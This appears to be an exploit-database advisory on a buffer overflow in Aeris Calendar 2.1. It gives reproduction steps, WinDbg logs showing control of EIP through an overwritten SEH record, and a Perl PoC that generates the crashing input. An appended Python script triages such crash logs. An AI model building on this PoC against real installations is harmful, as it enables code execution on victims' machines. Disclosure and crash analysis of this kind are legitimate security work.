Aeris Calandar 2.1 - Buffer Overflow Vulnerability
- Title : Aeris Calandar 2.1 - Buffer Overflow Vulnerability
- Author : ZwX
- Date : 27/11/2015
- Software Link : http://www.esumsoft.com/download/?prod=aeriscalendar
- Vendor : http://www.esumsoft.com/
- Tested On : Windows 7 & Windows XP SP3

===============================
* Description Vulnerability : *
===============================

A typical buffer overflow vulnerability exists in the Aeris Calandar software. An attacker can overwrite the EIP register in order to execute the next instruction of their choice, for example to execute arbitrary code.

=================================================
* Manual steps to reproduce the vulnerability : *
=================================================

1. Launch Aeris Calandar.exe
2. Click Weather -> Set Location
3. Copy the AAAA... string from bof.txt to the clipboard
4. Paste it into the "Enter your city or zip code" input and click Search
5. The software will crash

=================================
* Debug Session Logs [WINDBG] : *
=================================

Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=43434343 edx=77ce72cd esi=00000000 edi=00000000
eip=43434343 esp=0012cbe8 ebp=0012cc08 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
43434343 ?? ???
0:000> !exchain
0012cbfc: ntdll!RtlRaiseStatus+c8 (77ce72cd)
0012cfe4: ntdll!RtlRaiseStatus+c8 (77ce72cd)
0012f404: 43434343
Invalid exception stack at 42424242
0:000> d 0012f404
0012f404 42 42 42 42 43 43 43 43-00 00 00 00 80 32 44 00 BBBBCCCC.....2D. <== Control Register EIP
0012f414 a0 e6 1e 0b 01 00 00 00-08 be 51 00 60 f5 12 00 ..........Q.`...
0012f424 11 01 00 00 dd 92 38 00-fe ff ff ff c3 60 cf 77 ......8......`.w
0012f434 d0 5d cf 77 10 00 00 00-00 00 00 00 00 00 00 00 .].w............
0012f444 00 00 22 00 00 00 00 00-00 00 00 00 f4 f4 12 00 ..".............
0012f454 00 04 00 00 c0 01 05 00-f4 f4 12 00 00 00 00 00 ................
0012f464 fe ff ff ff fe c5 7f 77-94 52 7f 77 04 00 00 00 .......w.R.w....
0012f474 f2 64 4e 00 72 01 04 00-e7 c4 7f 77 c0 01 05 00 .dN.r......w....

===========================
* Proof Of Concept Perl : *
===========================

# Filler bytes ("A")
my $Buff = "\x41" x 8186;
# Appears as 42424242 in the debug session above
my $Buff1 = "\x42" x 4;
# Appears as 43434343 (eip) in the debug session above
my $Buff2 = "\x43" x 4;
open(MYFILE,'>>File.txt');
print MYFILE $Buff.$Buff1.$Buff2;
close(MYFILE);
print " POC Created by ZwX\n";

# 0day.today [2025-01-06] #
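
The !exchain output above shows the crash going through a corrupted exception handler record (handler 43434343, next pointer 42424242) rather than a plain return-address overwrite. As an added example that is not part of the original advisory, this Python sketch triages such a WinDbg log for crash analysis; `triage` and `is_fill` are hypothetical helper names, and the sample log is constructed from the lines quoted above.

```python
import re

# Constructed sample: register and !exchain lines copied from the session above.
SAMPLE_LOG = """\
eax=00000000 ebx=00000000 ecx=43434343 edx=77ce72cd esi=00000000 edi=00000000
eip=43434343 esp=0012cbe8 ebp=0012cc08 iopl=0 nv up ei pl zr na pe nc
0:000> !exchain
0012cbfc: ntdll!RtlRaiseStatus+c8 (77ce72cd)
0012cfe4: ntdll!RtlRaiseStatus+c8 (77ce72cd)
0012f404: 43434343
Invalid exception stack at 42424242
"""

REG_RE = re.compile(r"\b(e[a-d]x|e[sd]i|e[bs]p|eip)=([0-9a-f]{8})\b")
# An !exchain row is "<record>: <module!symbol> (<handler>)" when the handler
# resolves, or "<record>: <handler>" when it points at no loaded module.
CHAIN_RE = re.compile(
    r"^([0-9a-f]{8}): (?:\S+!\S+ \(([0-9a-f]{8})\)|([0-9a-f]{8}))[ \t]*$", re.M)
BAD_NEXT_RE = re.compile(r"Invalid exception stack at ([0-9a-f]{8})")

def is_fill(value):
    """True when the dword is one printable ASCII byte repeated, e.g. 0x43434343."""
    raw = value.to_bytes(4, "little")
    return len(set(raw)) == 1 and 0x20 <= raw[0] <= 0x7E

def triage(log):
    """Classify a 32-bit crash log; hypothetical helper, not a WinDbg feature."""
    regs = {name: int(val, 16) for name, val in REG_RE.findall(log)}
    bad_handlers = [(rec, int(raw, 16))
                    for rec, _resolved, raw in CHAIN_RE.findall(log) if raw]
    next_ptr = BAD_NEXT_RE.search(log)
    result = {
        "tainted_regs": sorted(n for n, v in regs.items() if is_fill(v)),
        "corrupt_records": [rec for rec, _h in bad_handlers],
        "next_ptr_is_fill": bool(next_ptr and is_fill(int(next_ptr.group(1), 16))),
        # eip equal to an unresolved handler means exception dispatch jumped there
        "eip_from_handler": any(h == regs.get("eip") for _r, h in bad_handlers),
    }
    if result["corrupt_records"] and result["eip_from_handler"]:
        result["verdict"] = "SEH record overwritten; eip taken from its handler"
    elif result["tainted_regs"]:
        result["verdict"] = "input bytes in registers; cause not determined"
    else:
        result["verdict"] = "no sign of input-controlled state"
    return result

if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

A log in which every !exchain row resolves to a module symbol and no register holds a repeated printable byte yields the "no sign of input-controlled state" verdict.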